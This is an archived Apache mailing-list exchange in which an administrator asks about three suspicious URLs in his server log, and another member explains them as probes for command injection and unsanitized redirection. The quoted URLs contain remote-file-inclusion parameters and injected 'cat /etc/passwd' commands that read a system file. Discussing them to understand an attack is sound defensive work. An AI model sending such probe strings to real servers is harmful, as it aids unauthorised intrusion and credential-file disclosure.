Re: Possible exploit?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

in first and last casehe was checking if it is possible to pass shell commands throught command or cmd parameter.not sure on second one but it looks like he was testing for unsanitized url redirection vul.


On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <apache@xxxxxxxxxxxxxxxx> wrote:
I found the following in my log this morning.  Does anybody know what it really means?  Thanks.

 A total of 3 possible successful probes were detected (the following URLs
 contain strings that match one or more of a listing of strings that
 indicate a possible exploit):


/user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP Response 302

/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP Response 302

/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP Response 302


--

Knute Johnson

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx




--
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus
[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux